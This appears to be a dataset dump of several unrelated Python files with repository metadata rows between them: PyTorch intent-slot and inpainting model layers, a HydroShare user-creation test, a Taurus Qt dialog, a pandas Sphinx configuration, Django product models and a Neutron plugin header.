#context word window
h_pad = torch.zeros(batch_size, 1, hidden).to(self.device) # [batch size, 1, hidden_dim*2]
h_left = torch.cat([h_pad, hidden_states_in[:, :seq_length - 1, :]], dim=1) # [batch size, seq len, hidden_dim*2]
h_right = torch.cat([hidden_states_in[:, 1:, :], h_pad], dim=1) # [batch size, seq len, hidden_dim*2]
hidden_states_in = torch.cat([hidden_states_in, h_left, h_right], dim=2) # [batch size, seq len, hidden_dim*6]
hidden_states = self.dense_in(hidden_states_in) # [batch size, seq len, hidden_dim]
hidden_states = self.intermediate_act_fn(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states = self.dense_out(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states = self.dropout(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states_I_NEW = self.LayerNorm_I(hidden_states + hidden_states_I) # [batch size, seq len, hidden_dim]
hidden_states_S_NEW = self.LayerNorm_S(hidden_states + hidden_states_S) # [batch size, seq len, hidden_dim]
return hidden_states_I_NEW, hidden_states_S_NEW
class SelfOutput(nn.Module):
def __init__(self, hidden_size, dropout):
super(SelfOutput, self).__init__()
self.dense = nn.Linear(hidden_size, hidden_size)
self.Layer_norm = nn.LayerNorm(hidden_size)
self.dropout = nn.Dropout(dropout)
def forward(self, hidden_states, input_tensor):
# hidden_states: [batch size, seq len, hidden_dim]
# input_tensor: [batch size, seq len, hidden_dim]
hidden_states = self.dense(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states = self.dropout(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states = self.Layer_norm(hidden_states + input_tensor) # [batch size, seq len, hidden_dim]
return hidden_states
class I_S_SelfAttention(nn.Module):
def __init__(self, hidden_size, n_heads, dropout, device):
super(I_S_SelfAttention, self).__init__()
assert hidden_size % n_heads == 0
self.hidden_size = hidden_size
self.n_heads = n_heads
self.head_dim = hidden_size // n_heads
self.query = nn.Linear(hidden_size, hidden_size)
self.query_slot = nn.Linear(hidden_size, hidden_size)
self.key = nn.Linear(hidden_size, hidden_size)
self.key_slot = nn.Linear(hidden_size, hidden_size)
self.value = nn.Linear(hidden_size, hidden_size)
self.value_slot = nn.Linear(hidden_size, hidden_size)
self.dropout = nn.Dropout(dropout)
self.scale = torch.sqrt(torch.FloatTensor([self.head_dim])).to(device)
def forward(self, intent, slot, mask):
# intent: [batch size, seq len, hidden_dim]
# slot: [batch size, seq len, hidden_dim]
# mask: [batch size, seq len]
extended_attention_mask = mask.unsqueeze(1).unsqueeze(2) #[batch size, 1, 1, seq len]
attention_mask = (1.0 - extended_attention_mask) * -10000.0 #[batch size, 1, 1, seq len]
batch_size = intent.shape[0]
mixed_query_layer = self.query(intent) # [batch size, seq len, hidden_dim]
mixed_key_layer = self.key(slot) # [batch size, seq len, hidden_dim]
mixed_value_layer = self.value(slot) # [batch size, seq len, hidden_dim]
mixed_query_layer_slot = self.query_slot(slot) # [batch size, seq len, hidden_dim]
mixed_key_layer_slot = self.key_slot(intent) # [batch size, seq len, hidden_dim]
mixed_value_layer_slot = self.value_slot(intent) # [batch size, seq len, hidden_dim]
query_layer = mixed_query_layer.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
key_layer = mixed_key_layer.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
value_layer = mixed_value_layer.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
query_layer_slot = mixed_query_layer_slot.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
key_layer_slot = mixed_key_layer_slot.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
value_layer_slot = mixed_value_layer_slot.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) / self.scale # [batch size, n heads, seq len, seq len]
attention_scores = attention_scores + attention_mask # [batch size, n heads, seq len, seq len]
attention_probs = torch.softmax(attention_scores, dim = -1) # [batch size, n heads, seq len, seq len]
context_layer = torch.matmul(self.dropout(attention_probs), value_layer) # [batch size, n heads, seq len, head dim]
context_layer = context_layer.permute(0, 2, 1, 3).contiguous() # [batch size, seq len, n heads, head dim]
context_layer = context_layer.view(batch_size, -1, self.hidden_size) # [batch size, seq len, hidden_dim]
attention_scores_slot = torch.matmul(query_layer_slot, key_layer_slot.transpose(-1, -2)) / self.scale # [batch size, n heads, seq len, seq len]
attention_scores_slot = attention_scores_slot + attention_mask # [batch size, n heads, seq len, seq len]
attention_probs_slot = torch.softmax(attention_scores_slot, dim = -1) # [batch size, n heads, seq len, seq len]
context_layer_slot = torch.matmul(self.dropout(attention_probs_slot), value_layer_slot) # [batch size, n heads, seq len, head dim]
context_layer_slot = context_layer_slot.permute(0, 2, 1, 3).contiguous() # [batch size, seq len, n heads, head dim]
context_layer_slot = context_layer_slot.view(batch_size, -1, self.hidden_size) # [batch size, seq len, hidden_dim]
return context_layer, context_layer_slot
class Joint_model(nn.Module):
def __init__(self, embed_dim, hidden_dim, n_class, n_tag, vocab_size, n_heads, dropout, device):
super(Joint_model, self).__init__()
self.embed_dim = embed_dim
self.hidden_dim = hidden_dim
self.n_class = n_class
self.n_tag = n_tag
self.vocab_size = vocab_size
self.n_heads = n_heads
self.dropout = dropout
self.device = device
self.embed = nn.Embedding(self.vocab_size, self.embed_dim, padding_idx=0)
self.biLSTM = nn.LSTM(self.embed_dim, self.hidden_dim // 2, bidirectional=True, batch_first=True)
self.intent_fc = nn.Linear(self.hidden_dim, self.n_class)
self.slot_fc = nn.Linear(self.hidden_dim, self.n_tag)
self.I_S_Emb = Label_Attention(self.intent_fc, self.slot_fc)
self.T_block = I_S_Block(self.hidden_dim, self.n_heads, self.dropout, self.device)
self.crflayer = CRF(self.n_tag)
self.criterion = nn.CrossEntropyLoss()
def forward_logit(self, inputs, mask):
# inputs:[batch size, seq len]
# mask:[batch size, seq len]
embeds = self.embed(inputs) # [batch size, seq len, embed_dim]
H, (_, _) = self.biLSTM(embeds) #[batch size, seq len, hidden_dim]
H_I, H_S = self.I_S_Emb(H, H)
#H_I: [batch size, seq len, hidden_dim]
#H_S: [batch size, seq len, hidden_dim]
H_I, H_S = self.T_block(H_I + H, H_S + H, mask)
#H_I: [batch size, seq len, hidden_dim]
#H_S: [batch size, seq len, hidden_dim]
intent_input = F.max_pool1d((H_I + H).transpose(1, 2), H_I.size(1)).squeeze(2) #[batch size, hidden_dim]
logits_intent = self.intent_fc(intent_input) #[batch size, n_class]
logits_slot = self.slot_fc(H_S + H) #[batch size, seq len, n_tag]
return logits_intent, logits_slot
def loss(self, logits_intent, logits_slot, intent_label, slot_label, mask):
loss_intent = self.criterion(logits_intent, intent_label)
logits_slot = logits_slot.transpose(1, 0)
slot_label = slot_label.transpose(1, 0)
mask = mask.transpose(1, 0)
loss_slot = -self.crflayer(logits_slot, slot_label, mask) / logits_intent.size()[0]
return loss_intent, loss_slot
def pred_intent_slot(self, logits_intent, logits_slot, mask):
pred_intent = torch.max(logits_intent, 1)[1]
mask = mask.transpose(1, 0)
logits_slot = logits_slot.transpose(1, 0)
pred_slot = self.crflayer.decode(logits_slot, mask=mask)
return pred_intent, pred_slot
| 58.921569
| 162
| 0.675291
|
9863a92f017b8cb127004c21f35767ccbeae52b7
| 2,060
|
py
|
Python
|
hs_access_control/tests/test_create_user.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 178
|
2015-01-08T23:03:36.000Z
|
2022-03-03T13:56:45.000Z
|
hs_access_control/tests/test_create_user.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 4,125
|
2015-01-01T14:26:15.000Z
|
2022-03-31T16:38:55.000Z
|
hs_access_control/tests/test_create_user.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 53
|
2015-03-15T17:56:51.000Z
|
2022-03-17T00:32:16.000Z
|
from django.test import TestCase
from django.contrib.auth.models import Group
from hs_core import hydroshare
from hs_core.testing import MockIRODSTestCaseMixin
from hs_access_control.tests.utilities import global_reset, \
assertUserResourceState, assertUserGroupState
class T01CreateUser(MockIRODSTestCaseMixin, TestCase):
def setUp(self):
super(T01CreateUser, self).setUp()
global_reset()
self.group, _ = Group.objects.get_or_create(name='Hydroshare Author')
self.admin = hydroshare.create_account(
'admin@gmail.com',
username='admin',
first_name='administrator',
last_name='couch',
superuser=True,
groups=[]
)
self.cat = hydroshare.create_account(
'cat@gmail.com',
username='cat',
first_name='not a dog',
last_name='last_name_cat',
superuser=False,
groups=[]
)
self.dpg = hydroshare.create_account(
'dog@gmail.com',
username='dog',
first_name='a little',
last_name='arfer',
superuser=False,
groups=[]
)
def test_01_create_state(self):
"""User state is correct after creation"""
# check that privileged user was created correctly
self.assertEqual(self.admin.uaccess.user.username, 'admin')
self.assertEqual(self.admin.uaccess.user.first_name, 'administrator')
self.assertTrue(self.admin.is_active)
# start as privileged user
assertUserResourceState(self, self.admin, [], [], [])
# check that unprivileged user was created correctly
self.assertEqual(self.cat.uaccess.user.username, 'cat')
self.assertEqual(self.cat.uaccess.user.first_name, 'not a dog')
self.assertTrue(self.cat.is_active)
# check that user cat owns and holds nothing
assertUserResourceState(self, self.cat, [], [], [])
assertUserGroupState(self, self.cat, [], [], [])
| 32.1875
| 77
| 0.622816
|
5aca24ca63acf9673d2965b0d1d03078133f8c63
| 10,552
|
py
|
Python
|
src/layers.py
|
zigonk/MST_inpainting
|
a06d8b433cda61f7f972abebcd0363b49943566d
|
[
"MIT"
] | 30
|
2021-03-29T06:14:07.000Z
|
2022-01-24T03:38:34.000Z
|
src/layers.py
|
zigonk/MST_inpainting
|
a06d8b433cda61f7f972abebcd0363b49943566d
|
[
"MIT"
] | 1
|
2021-08-15T03:39:58.000Z
|
2021-10-06T09:25:55.000Z
|
src/layers.py
|
zigonk/MST_inpainting
|
a06d8b433cda61f7f972abebcd0363b49943566d
|
[
"MIT"
] | 6
|
2021-11-10T03:49:47.000Z
|
2022-03-18T03:38:18.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class BaseNetwork(nn.Module):
def __init__(self):
super(BaseNetwork, self).__init__()
def init_weights(self, init_type='normal', gain=0.02):
'''
initialize network's weights
init_type: normal | xavier | kaiming | orthogonal
https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/9451e70673400885567d08a9e97ade2524c700d0/models/networks.py#L39
'''
def init_func(m):
classname = m.__class__.__name__
if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
if init_type == 'normal':
nn.init.normal_(m.weight.data, 0.0, gain)
elif init_type == 'xavier':
nn.init.xavier_normal_(m.weight.data, gain=gain)
elif init_type == 'kaiming':
nn.init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
elif init_type == 'orthogonal':
nn.init.orthogonal_(m.weight.data, gain=gain)
if hasattr(m, 'bias') and m.bias is not None:
nn.init.constant_(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1:
nn.init.normal_(m.weight.data, 1.0, gain)
nn.init.constant_(m.bias.data, 0.0)
self.apply(init_func)
class GateConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, transpose=False):
super(GateConv, self).__init__()
self.out_channels = out_channels
if transpose:
self.gate_conv = nn.ConvTranspose2d(in_channels, out_channels * 2,
kernel_size=kernel_size,
stride=stride, padding=padding)
else:
self.gate_conv = nn.Conv2d(in_channels, out_channels * 2,
kernel_size=kernel_size,
stride=stride, padding=padding)
def forward(self, x):
x = self.gate_conv(x)
(x, g) = torch.split(x, self.out_channels, dim=1)
return x * torch.sigmoid(g)
class Conv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, transpose=False,
use_spectral_norm=False):
super(Conv, self).__init__()
self.out_channels = out_channels
if transpose:
self.conv = nn.ConvTranspose2d(in_channels, out_channels,
kernel_size=kernel_size, stride=stride,
padding=padding, bias=not use_spectral_norm)
else:
self.conv = nn.Conv2d(in_channels, out_channels,
kernel_size=kernel_size, stride=stride,
padding=padding, bias=not use_spectral_norm)
if use_spectral_norm:
self.conv = spectral_norm(self.conv)
def forward(self, x):
return self.conv(x)
class SNGateConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, dilation=1,
transpose=False):
super(SNGateConv, self).__init__()
self.out_channels = out_channels
if transpose:
self.gate_conv = spectral_norm(nn.ConvTranspose2d(in_channels, out_channels * 2,
kernel_size=kernel_size, bias=False,
stride=stride, padding=padding,
dilation=dilation), mode=True)
else:
self.gate_conv = spectral_norm(nn.Conv2d(in_channels, out_channels * 2,
kernel_size=kernel_size, bias=False,
stride=stride, padding=padding,
dilation=dilation), mode=True)
def forward(self, x):
x = self.gate_conv(x)
(x, g) = torch.split(x, self.out_channels, dim=1)
return x * torch.sigmoid(g)
class SeparableDecoder(nn.Module):
def __init__(self, input_channels, emb_channels, output_channel=None, stride=1):
super(SeparableDecoder, self).__init__()
self.emb_ch = emb_channels
self.deconv_ch = input_channels // 2 if stride == 2 else input_channels
self.decoder_conv = nn.Sequential(
SNGateConv(in_channels=input_channels, out_channels=self.deconv_ch, kernel_size=3 if stride == 1 else 4,
stride=stride, padding=1, transpose=True if stride > 1 else False),
nn.InstanceNorm2d(self.deconv_ch, track_running_stats=False),
nn.ReLU(True)
)
self.emb_head = nn.Sequential(
nn.Conv2d(self.deconv_ch, emb_channels * 2, kernel_size=3, stride=1, padding=1),
nn.InstanceNorm2d(emb_channels * 2, track_running_stats=False),
nn.ReLU(True)
)
self.att_head = nn.Sequential(
nn.Conv2d(emb_channels * 2, emb_channels, kernel_size=3, stride=1, padding=1),
nn.InstanceNorm2d(emb_channels, track_running_stats=False),
nn.ReLU(True),
nn.Conv2d(in_channels=emb_channels, out_channels=1, kernel_size=3, stride=1, padding=1),
nn.Sigmoid()
)
self.to_edge = nn.Sequential(
nn.Conv2d(emb_channels, 1, kernel_size=3, stride=1, padding=1),
nn.Sigmoid()
)
self.to_line = nn.Sequential(
nn.Conv2d(emb_channels, 1, kernel_size=3, stride=1, padding=1),
nn.Sigmoid()
)
self.to_rgb = nn.Sequential(
nn.Conv2d(emb_channels, 3, kernel_size=3, stride=1, padding=1),
nn.Tanh()
)
if output_channel is not None:
self.proj = nn.Conv2d(in_channels=self.deconv_ch + emb_channels,
out_channels=output_channel, kernel_size=1, stride=1, padding=0)
else:
self.proj = None
def forward(self, x):
x = self.decoder_conv(x)
emb = self.emb_head(x)
e, l = torch.split(emb, self.emb_ch, dim=1)
edge = self.to_edge(e)
line = self.to_line(l)
att = self.att_head(emb)
x_combine = e * att + l * (1 - att)
rgb = self.to_rgb(x_combine)
# rgb = (rgb + 1) / 2
if self.proj:
x_out = torch.cat([x, x_combine], dim=1) # deconv_ch+emb
x_out = self.proj(x_out)
return x_out, rgb, edge, line, att
else:
return rgb, edge, line, att
class EfficientAttention(nn.Module):
def __init__(self, in_channels, dim, head_count, out_channels):
super().__init__()
self.in_channels = in_channels
self.head_count = head_count
self.dim = dim
self.keys = nn.Conv2d(in_channels, dim, 1)
self.queries = nn.Conv2d(in_channels, dim, 1)
self.values = nn.Conv2d(in_channels, dim, 1)
if dim != out_channels:
self.reprojection = nn.Conv2d(dim, out_channels, 1)
else:
self.reprojection = None
def forward(self, input_, mask=None, return_scores=False):
n, _, h, w = input_.size()
keys = self.keys(input_)
queries = self.queries(input_)
values = self.values(input_)
head_channels = self.dim // self.head_count
if mask is not None:
# [b,1,h,w]
mask = F.interpolate(mask, size=[h, w], mode='nearest')
keys += (mask * -10000.0)
queries += (mask * -10000.0)
keys = keys.reshape((n, self.dim, h * w)) # [b,d,h*w]
queries = queries.reshape(n, self.dim, h * w)
values = values.reshape((n, self.dim, h * w))
attended_values = []
scores = 0
for i in range(self.head_count):
key = F.softmax(keys[:, i * head_channels: (i + 1) * head_channels, :], dim=2)
query = F.softmax(queries[:, i * head_channels: (i + 1) * head_channels, :], dim=1)
value = values[:, i * head_channels: (i + 1) * head_channels, :]
context = key @ value.transpose(1, 2) # [b, d, d]
attended_value = (context.transpose(1, 2) @ query).reshape(n, head_channels, h, w)
attended_values.append(attended_value)
if return_scores:
score = torch.matmul(query.transpose(1, 2), key) # [b, hw, hw]
score = torch.mean(score, dim=1).reshape([n, h, w])
scores += score
aggregated_values = torch.cat(attended_values, dim=1)
if self.reprojection is not None:
reprojected_value = self.reprojection(aggregated_values)
else:
reprojected_value = aggregated_values
attention = reprojected_value + input_
if return_scores:
max_value, _ = torch.max(scores.reshape([n, h * w]), dim=1)
max_value = max_value[:, None, None]
scores = scores / (max_value + 1e-5)
scores = scores.unsqueeze(1)
scores = scores.detach()
return attention, scores
else:
return attention
class ResnetBlock(nn.Module):
def __init__(self, dim, dilation=1, use_spectral_norm=False):
super(ResnetBlock, self).__init__()
self.conv_block = nn.Sequential(
nn.ReflectionPad2d(dilation),
spectral_norm(nn.Conv2d(in_channels=dim, out_channels=dim, kernel_size=3, padding=0, dilation=dilation,
bias=not use_spectral_norm), use_spectral_norm),
nn.InstanceNorm2d(dim, track_running_stats=False),
nn.ReLU(True),
nn.ReflectionPad2d(1),
spectral_norm(nn.Conv2d(in_channels=dim, out_channels=dim, kernel_size=3, padding=0, dilation=1,
bias=not use_spectral_norm), use_spectral_norm),
nn.InstanceNorm2d(dim, track_running_stats=False),
)
def forward(self, x):
out = x + self.conv_block(x)
# Remove ReLU at the end of the residual block
# http://torch.ch/blog/2016/02/04/resnets.html
return out
def spectral_norm(module, mode=True):
if mode:
return nn.utils.spectral_norm(module)
return module
| 41.380392
| 132
| 0.563779
|
1c6904a0bb5b30c127a87e05ee16d085d6dad797
| 2,361
|
py
|
Python
|
lib/taurus/qt/qtgui/dialog/taurusconfigurationdialog.py
|
MikeFalowski/taurus
|
ef041bf35dd847caf08a7efbe072f4020d35522e
|
[
"CC-BY-3.0"
] | 1
|
2016-10-19T13:54:08.000Z
|
2016-10-19T13:54:08.000Z
|
lib/taurus/qt/qtgui/dialog/taurusconfigurationdialog.py
|
MikeFalowski/taurus
|
ef041bf35dd847caf08a7efbe072f4020d35522e
|
[
"CC-BY-3.0"
] | 27
|
2016-05-25T08:56:58.000Z
|
2019-01-21T09:18:08.000Z
|
lib/taurus/qt/qtgui/dialog/taurusconfigurationdialog.py
|
MikeFalowski/taurus
|
ef041bf35dd847caf08a7efbe072f4020d35522e
|
[
"CC-BY-3.0"
] | 8
|
2015-07-24T09:16:50.000Z
|
2018-06-12T12:33:59.000Z
|
# !/usr/bin/env python
#############################################################################
##
# This file is part of Taurus
##
# http://taurus-scada.org
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Taurus is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Taurus is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Taurus. If not, see <http://www.gnu.org/licenses/>.
##
#############################################################################
"""This module provides a set of dialog based widgets"""
__all__ = ["TaurusConfigurationDialog"]
__docformat__ = 'restructuredtext'
from taurus.external.qt import Qt
from taurus.qt.qtgui.panel.taurusconfigurationpanel import TaurusConfigurationPanel
class TaurusConfigurationDialog(Qt.QDialog):
def __init__(self, parent=None, designMode=False):
Qt.QDialog.__init__(self, parent)
self.setWindowTitle('TaurusConfigurationDialog')
layout = Qt.QVBoxLayout()
self.setLayout(layout)
ConfigPanel = TaurusConfigurationPanel
self._panel = ConfigPanel(self)
layout.setContentsMargins(0, 0, 0, 0)
layout.addWidget(self._panel)
self._panel._ui.pushButtonOk.setVisible(True)
self._panel._ui.pushButtonCancel.setVisible(True)
self._panel._ui.pushButtonOk.clicked.connect(self._onOk)
self._panel._ui.pushButtonCancel.clicked.connect(self._onCancel)
self.adjustSize()
self.show()
def _onOk(self):
self._panel._onOk()
self._onCancel()
def _onCancel(self):
self.close()
def setModel(self, model):
self._panel.setModel(model)
def main():
import sys
attr_name = sys.argv[1]
a = Qt.QApplication([])
d = TaurusConfigurationDialog()
d.setModel(attr_name)
return a.exec_()
if __name__ == "__main__":
import sys
sys.exit(main())
| 31.065789
| 83
| 0.659466
|
24ad80233e11f83a5b5a84e784395f5769767546
| 8,141
|
py
|
Python
|
doc/source/conf.py
|
timClicks/pandas
|
83b216c9efb439c1d19690feff1dcba58c6a2f88
|
[
"BSD-3-Clause"
] | 1
|
2020-09-17T11:33:26.000Z
|
2020-09-17T11:33:26.000Z
|
doc/source/conf.py
|
timClicks/pandas
|
83b216c9efb439c1d19690feff1dcba58c6a2f88
|
[
"BSD-3-Clause"
] | null | null | null |
doc/source/conf.py
|
timClicks/pandas
|
83b216c9efb439c1d19690feff1dcba58c6a2f88
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# pandas documentation build configuration file, created by
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../sphinxext'))
sys.path.extend([
# numpy standard doc extensions
os.path.join(os.path.dirname(__file__),
'..', '../..',
'sphinxext')
])
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones. sphinxext.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'numpydoc',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
'sphinx.ext.ifconfig',
'sphinx.ext.autosummary',
'matplotlib.sphinxext.only_directives',
'matplotlib.sphinxext.plot_directive',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates', '_templates/autosummary']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pandas'
copyright = u'2008-2011, AQR Capital Management, LLC, pandas developers'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import pandas
# def svn_version():
# import os, subprocess, re, warnings
# env = os.environ.copy()
# env['LC_ALL'] = 'C'
# try:
# out = subprocess.Popen(['svn', 'info'], stdout=subprocess.PIPE,
# env=env).communicate()[0]
# except OSError:
# warnings.warn(" --- Could not run svn info --- ")
# return ""
# r = re.compile('Revision: ([0-9]+)')
# svnver = None
# for line in out.split('\n'):
# m = r.match(line)
# if m:
# svnver = m.group(1)
# if not svnver:
# raise ValueError("Error while parsing svn version ?")
# return svnver
# version = '%s r%s' % (pandas.__version__, svn_version())
version = '%s' % (pandas.__version__)
# The full version, including alpha/beta/rc tags.
release = version
# JP: added from sphinxdocs
autosummary_generate = True
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'statsmodels.css'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'pandas'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pandas.tex', u'pandas Documentation',
u'Wes McKinney', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.scipy.org/': None}
import glob
autosummary_generate = glob.glob("*.rst")
| 31.800781
| 80
| 0.691193
|
3e2bf6c70b06cce43a8fd0037fcb1899c5e1e6f2
| 1,205
|
py
|
Python
|
products/models.py
|
ZendaInnocent/simple-online-book-store
|
211e57fe32dc239ea01ce1160b621670cd4b3afa
|
[
"MIT"
] | 1
|
2020-04-13T20:26:24.000Z
|
2020-04-13T20:26:24.000Z
|
products/models.py
|
ZendaInnocent/simple-online-book-store
|
211e57fe32dc239ea01ce1160b621670cd4b3afa
|
[
"MIT"
] | null | null | null |
products/models.py
|
ZendaInnocent/simple-online-book-store
|
211e57fe32dc239ea01ce1160b621670cd4b3afa
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.urls import reverse
class ProductManager(models.Manager):
def active(self):
return self.filter(active=True)
class Product(models.Model):
name = models.CharField(max_length=50)
slug = models.SlugField()
description = models.TextField(blank=True)
price = models.DecimalField(max_digits=6, decimal_places=2)
in_stock = models.BooleanField(default=True)
updated = models.DateTimeField(auto_now=True)
active = models.BooleanField(default=True)
objects = ProductManager()
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('products:product-detail', kwargs={'slug': self.slug})
class ProductImage(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE)
thumbnail = models.ImageField(upload_to='product-thumbnails/', null=True)
image = models.ImageField(upload_to='product-images/')
class ProductTag(models.Model):
products = models.ManyToManyField(Product)
name = models.CharField(max_length=50)
slug = models.SlugField()
description = models.TextField(blank=True)
active = models.BooleanField(default=True)
| 29.390244
| 77
| 0.727801
|
661c77b596aba446c3078ad7fea67435ab0572cc
| 62,745
|
py
|
Python
|
neutron/plugins/nuage/plugin.py
|
armando-migliaccio/neutron-1
|
e31861c15bc73e65a7c22212df2a56f9e45aa0e4
|
[
"Apache-2.0"
] | null | null | null |
neutron/plugins/nuage/plugin.py
|
armando-migliaccio/neutron-1
|
e31861c15bc73e65a7c22212df2a56f9e45aa0e4
|
[
"Apache-2.0"
] | null | null | null |
neutron/plugins/nuage/plugin.py
|
armando-migliaccio/neutron-1
|
e31861c15bc73e65a7c22212df2a56f9e45aa0e4
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Alcatel-Lucent USA Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import re
import netaddr
